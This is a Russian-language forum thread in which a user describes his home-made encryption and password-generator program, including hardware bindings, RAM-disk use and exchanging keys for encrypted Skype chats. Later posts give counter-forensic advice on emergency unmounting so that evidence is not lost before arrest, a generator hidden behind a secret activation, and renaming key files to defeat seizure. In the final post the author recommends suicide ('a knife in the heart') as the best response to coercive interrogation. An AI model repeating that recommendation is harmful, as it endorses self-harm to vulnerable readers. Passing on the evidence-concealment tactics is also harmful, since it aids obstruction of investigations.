    При нажатии "галочку" в строке Status появится сообщение. В зависимости от того, установит или снимет ли пользователь "галочку", строка статуса будет меняться, оповещая пользователя о том будут ли включены\исключены выбранные им параметры из списка привязанных к паролю шифрования. Важно помнить, что первоочередную роль играет последовательность выбранных пользователем привязок к индивидуальным характеристикам компьютера. Так, если изначально на стадии шифрования пользователь выбрал сначала привязку к серийному номеру BIOS, а затем установил галочку на привязку к серийному номеру USB-устройства, в стадии дешифрования необходимо соблюдать ту же последовательность. На стадии дешифрования недопустима ситуация, когда пользователь сначала ставит "галочку" на привязку к USB-устройству, а затем - на привязку к серийному номеру BIOS. Таким образом, должна быть запомнена и соблюдаться четкая последовательность при установке программно-аппаратных привязок к паролю. Чтобы завершить стадию привязки текущего пароля к алгоритму шифрования нажмите кнопку Apply. Чтобы отменить все привязки, снимите ранее установленные галочки, либо нажмите кнопку Delete all attachments, окно формы автоматически закроется и для текущего пароля будут отменены все выбранные ранее привязки. Аналогичным образом, необходимо соблюдать четкую последовательность при выборе привязочных файлов (кнопка Add file). Если на стадии шифрования пользователь выбирал сначала файл 123.jpg, затем файл desktop.ini, то и на стадии дешифровки необходимо соблюдать ту же последовательность выбора файлов.

    Для шифрования текста в программе имеется встроенный текстовый редактор с минимум возможностей, позволяющий вводить только текст. Активация текстового редактора происходит по двойному нажатию на текстовое поле с наименованием [ enter text ] в главном окне программы. Текстовый редактор позволяет в более удобной форме напечатать шифруемый текст без использования буфера обмена или сохранения текстового файла на жесткий диск. Нажатие на кнопку Send to main позволяет отправить напечатанный текст в главное окно программы и закрыть форму. Кнопка Close закрывает данную форму, а кнопка End program полностью прекращает работу программы.

    В главном интерфейсе программы имеется возможность также зашифровать файл (кнопка Encrypt file) и папку (Encrypt folder). Применять данные опции я советую в редких случаях, т.к. исходные коды шифров были написаны на языке Visual Basic 6.0 и работают на файлах большого объема довольно медленно, а их последовательное применение может еще больше замедлить работу. В основном, данная программа предназначена для шифрования текстовой информации, такой как списки паролей, номеров телефонов, идентификаторов для доступа к личным аккаунтам и пр. и ее использование нецелесообразно для шифрования графических или медиа-файлов. Однако, программа довольно быстро шифрует файлы и папки небольшого объема.

    После каждой процедуры шифрования\дешифрования текста, файлов или папок необходимо перезагружать программу, чтобы сбросить счетчик псевдопроизвольной генерации чисел. Данный счетчик оказывает влияние на правильность сгенерированного для каждого алгоритма пароля длиной 512 символов, состоящего из всех символов таблицы символов Windows.

    Рекомендации по работе:

    1) если вы шифруете файлы, лучше всего поместить их на созданный с помощью такой программы, как Gilisoft RamDisk виртуальный диск в оперативной памяти. После шифрования файла\папки и копирования зашифрованного файла на твердый носитель, виртуальный RAM-диск необходимо уничтожить. Аналогичным образом необходимо проводить процедуру дешифровки, переместив зашифрованный файл сначала на виртуальный RAM-диск, после дешифровки и перемещения файла на твердный носитель, RAM-диск уничтожается.
    2) вы можете вводить в текстовое поле [ password ] сколь угодно простые пароли, в том числе 111, 222 или 333 - в любом случае, конечная длина сгенерированного пароля будет равна 512 символам; убедиться в этом можно, просмотрев исходные коды программы
    3) рекомендуется соблюдать четкую последовательность. Если вы хотите использовать не только привязку к введенному паролю, файлам, но и к программно-аппаратным индивидуальным характеристикам компьютера, рекомендуется сначала ввести в текстовое поле [ password ] пароль, затем выбрать необходимо количество привязочных файлов, а уже после этого, нажав кнопку Other options, пометить нужные программно-аппаратные привязки. После этого, для добавления списка сгенерированных значений, пользователь нажимает кнопку Add algorithm и выбранный алгоритм вместе со сгенерированными
    значениями появляется в списке алгоритмов.

    Исходные коды: [прямая ссылка]

    Стандартная + упакованная версия программы: [прямая ссылка]

    Автор не несет никакой ответственности за использование пользователем данной разработки.
     
    #70 black_berry, 9 Nov 2011
    Last edited: 18 Nov 2011
    1 person likes this.
  11. mrok

    mrok New Member

    Joined:
    8 Nov 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Очень интересная тема! Автору спасибо,узнал много нового.
    И пару строк по сабжу. Было както сказано что генерацию пароля можно привязать к комплектующим "рабочей лошадки", и то что бывает что при осмотре извлекают диски и оперу для досмотра,при етом нашу машину не включая,а иследуя все на своих. Превлекать нашу могут только тогда когда не смогут проанализировать ключ и розкриптовать данные.
    А ведь можно себя еще обезопасить!
    Если случилась такая неприятная ситуация с изьятием, и вся ситуация такая как я выше описал, можно сменить комплектующие пк(хотя б 1), то которое относиться к генерации ключа, тем самым не дать "оборотням " использовать твое железо против тебя.

    Если я ошибаюсь или не вижу полной картины поправте меня. Еще раз спасибо за инфу, интересно читать.
     
  12. Steam[777]

    Steam[777] Elder - Старейшина

    Joined:
    27 Sep 2010
    Messages:
    296
    Likes Received:
    43
    Reputations:
    25
    Не надейся, ПК изымут вместе с дисками
     
  13. mrok

    mrok New Member

    Joined:
    8 Nov 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    возможно, хотя я знаю случаи когда приходили и вырывали винт,а потом через время отдавали, когда ничего не обнаруживали.
     
  14. Steam[777]

    Steam[777] Elder - Старейшина

    Joined:
    27 Sep 2010
    Messages:
    296
    Likes Received:
    43
    Reputations:
    25
    Забудь... Не стоит недооценивать "противника" :)
    Время не стоит на месте, и "ребята" вполне уже знают что такое RAID ( нулевой в том числе :) ), и забирают всё абсолютно - не только комп,но и прочие носители - включая телефоны и фотоаппараты
     
  15. black_berry

    black_berry Active Member

    Joined:
    1 May 2010
    Messages:
    641
    Likes Received:
    124
    Reputations:
    31
    Можно, я это реализовал в одной из последних версий генератора. Единственное условие - генератор никогда нельзя держать на открытых носителях, т.е. либо сам исполняемый файл должен быть зашифрован, а шифровальная программа должна находиться на зашифрованном носителе, либо сам генератор должен находиться на зашифрованных разделах или в криптоконтейнерах.

    По второй части вопроса - у них это успешно получится, если тебя застали за работой и ты не успел сделать экстренное размонтирование раздела, на котором висит этот генератор. Если ты размонтировал раздел "горячими кнопками", ситуация для них не очень приятная, поэтому как правило если идет информация, что на компьютере зашифрованные данные, тебя на стадии задержания сразу ложат на пол и надевают наручники, чтобы ты, сделав экстренный дизмаунт, не успел уничтожить улики. Можно конечно сделать иначе, например каждые 2-3 минуты подтверждать продолжение работы компьютера какой-нибудь кнопкой, в противном случае он автоматически выключается, но так очень быстро задолбаться можно.

    По третьей части вопроса - если шифровать другие разделы в привязке к характеристикам операционной системы (название, версия, серийный номер, разрешение экрана и пр.) и если сам раздел, на котором находится операционная система - зашифрован, и если генератор ключей к другим зашифрованным разделам находится в криптоконтейнере, который в свою очередь защищен другим генератором и ключевыми файлами - то задача для противника усложняется. Про второй генератор - тут может частично помочь маскировка, т.е. скажем активация генератора только при нажатии определенной кнопки или комбинации клавиш в течение 3х секунд с момента запуска исполняемого файла, в противном случае программа завершает работу. Если противник не знает, как его активировать и вообще не подозревает что это генератор - это может спасти ситуацию. Пароли этого генератора, в свою очередь, могут быть привязаны к любому файлу и его характеристикам, а файлов на компьютере тысячи уже по умолчанию после установки той же Windows. Есть у тебя, скажем, есть файл 012_Megan_Fox_Porno.avi, при работе с которым генератор выдаст верное для раскрытия криптоконтейнера значение, но ты в любой момент можешь переименовать его в 013_Megan_Fox_Porno.avi (самое главное тут помнить что и на что ты переименовывал), генератор не выдаст верное значение для дешифровки. Поэтому всегда рекомендуется, если такая ситуация имеет место быть, после демонтирования основных зашифрованных разделов переименовывать ключевые привязочные файлы.
     
  16. GAiN

    GAiN Elder - Старейшина

    Joined:
    2 Apr 2011
    Messages:
    2,550
    Likes Received:
    172
    Reputations:
    99
    а сложно ли сделать свой шифратор файлов ? и шифратор/дешифратор голоса для скайпа?
     
  17. black_berry

    black_berry Active Member

    Joined:
    1 May 2010
    Messages:
    641
    Likes Received:
    124
    Reputations:
    31
    Можно, если обладаешь навыками программирования и использования исходных кодов шифров. Придумывать собственный шифр без знания основных и широко используемых криптографических алгоритмов - затея не из лучших, т.к. даже обладая навыками в области программирования на уровне профессионала, вы вряд ли сможете придумать что-то лучше общеизвестных и проверенных временем шифров.

    Незачем придумывать шифратор голоса для скайпа, достаточно просто посмотреть через какие серверы идет соединение во время разговора в файрволле. Если вы используете OpenVPN из Европейской страны, разговоры через Skype идут через Европейского оператора связи, а не Российского.

    Если вы все же хотите использовать Skype для передачи шифрованных сообщений, это можно реализовать в Skype-чате, передавая там стабилизированные для передачи по общедоступным каналам связи зашифрованные сообщения наподобие:

    onFrffmZ7ukh6RNlXyvjgfK7JpqkznybmBf2b3w+7Mw=

    Перед этим следует в приватном режиме обменяться генератором и паролями на первый сеанс связи, или же передать их по сети Интернет. Обычно делается по первой схеме: в реале вы встречаетесь с человеком, передаете ему программу для генерации паролей и саму шифровальную программу, затем в приватном режиме говорите пароль на первый сеанс связи, после чего вы и ваш друг с помощью генератора генерируют по обе стороны идентичные пароли, которые будут использованы для шифрования\дешифрования текста. Затем вы вбиваете в генератор, который вы передали вместе с шифровальном программу вашему другу, сказанный ему пароль, и получаете конечное значение для шифрования текста. После шифрования текста данным паролем вы получаете конечный зашифрованный текст, пример которого приведен выше, и передаете его вашему другу через Skype-чат. Ваш друг, отталкиваясь от ключевой парольной фразы, которую вы ему передали на стадии передачи программы вместе с генератором, генерирует используя переданный вами генератор идентичный вашему пароль на своей стороне и с помощью переданной вами шифровальной программы дешифровывает отправленный вами текст.
     
    #77 black_berry, 16 Nov 2011
    Last edited: 16 Nov 2011
  18. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    прочитал первые три страницы на одном дыхании...очень интересно...
    по сравнению с предложениями автора мои слова покажутся банальными, но...
    Мне кажется, что главное правило защиты информации - работать только с той машины, которая находится в физическом удалении от вас. и через yota/wifi. (на чужие данные). а на хоум пк ничего не иметь.
    Что бы защитить себя, от действий хакеров...достаточно серфить интернет под виртуальной машиной и в гугл хроме с оффнутым подключением плагинов. Даже если вы пробьетесь/словите трой, то в рамках виртуальной машины извлечь персональную информацию будет невозможно + естественно избегать регистраций в соц сетях и "домашних" имейлах. общение через im клиенты/соц сети производить с другой виртуальной машины и за пределы двух-трех сайтов не выходить.

    Любая защита может быть взломана правоохранительными органами. не важно какая страна, важно насколько вы их заинтересуете... я думаю у цру, фсб и прочих органов найдутся полномочия, которые позволят им применить к вам спец. средства(паяльник/биту) для извлечения информации. Очень просто вас могут обвинить в терроризме... так как -"Полностью соблюдая права человека, бороться с терроризмом невозможно"

    Так что увы...пока есть контроль над интернетом.... оставаться полностью анонимным почти не возможно
     
  19. Steam[777]

    Steam[777] Elder - Старейшина

    Joined:
    27 Sep 2010
    Messages:
    296
    Likes Received:
    43
    Reputations:
    25
    2black_berry
    Извини,друг,но при всем моём уважении ты начинаешь немного "перебарщивать", и от практики уходить в область теории,и очень увлекаешься....
    Я ничего против не имею,но ты чуть-чуть притормози,пожалуйста....
    Это ведь общедоступный форум....
     
  20. black_berry

    black_berry Active Member

    Joined:
    1 May 2010
    Messages:
    641
    Likes Received:
    124
    Reputations:
    31
    Не смотрите слишком много новостей по телевидению про "соблюдение прав человека и борьбу с терроризмом", это заставляет человека начать сомневаться, затуманивает сознание и мешает ясно мыслить. Вы ведь фактически говорите словами из телевизора, а ему верить нельзя. Касательно вашей реплики про заинтересованность - заинтересовать их должны не вы, а что вы из себя представляете, что у вас есть и что вы возможно собираетесь сделать, если вы начнете представлять для кого-то угрозу. Если человек постоянно будет бояться и думать о том, "а представляет ли он интерес для кого-то" - этот человек обречен на сумасшествие. Поэтому не надо бояться - надо твердо знать, что существует законодательство, суды, в том числе суды присяжных, и человек признается виновным и считается осужденным только по решению суда. Если вы считаете, что указанным вами организациям "всё дозволено", вы глубоко ошибаетесь. Конечно, они могут начать использовать психологические и физические методы допроса для получения паролей, поэтому в литературе по информационной безопасности четко написано, что самым слабым звеном в системе безопасности является человек. Я в каком-то сообщении упоминал про сцену из фильма "Говорящие с ветром", когда американского шифровальщика из племени Навахо схватили вьетнамцы, и тогда сам охранник бросил во всех них гранату. Думайте сами, стоила ли жизнь того человека информации, которой он владел. Если ценность информации настолько высока, что к вам начали применять специальные методы допроса, лучший выход - это пример из этого фильма, в ракурсе данной беседы - нож в сердце.

    У меня нет доступа в закрытые разделы форума - если бы были, писал бы там об этом. Я всего лишь обычный исследователь в области информационной безопасности, и все приведенные мной примеры - результат анализа информации, полученной из открытых источников. Те же книги, фильмы и пр. Я не совершил никаких противозаконных действий, если таковым уже по чьей-то указке не считаются личные индивидуальные исследования в области защиты в свободное от работы время. И если наша страна опустится до того, чтобы обвинять в чем-то исследователей в области безопасности, то грошь ей цена.

    Ты знаешь, жизнь человека - это очень хрупкая вещь, и в любой момент может наступить ее конец. И будет очень обидно после этого знать, что на протяжении всей жизни ты не смог изменить чью-то жизнь, не смог что-то узнать сам и не дать людям этого. Я не понимаю тех, кто молчат о своих достижениях - если не для людей, то ради чего они шли к этому? И кому эти достижения будут нужны в будущем, если они не расскажут об этом?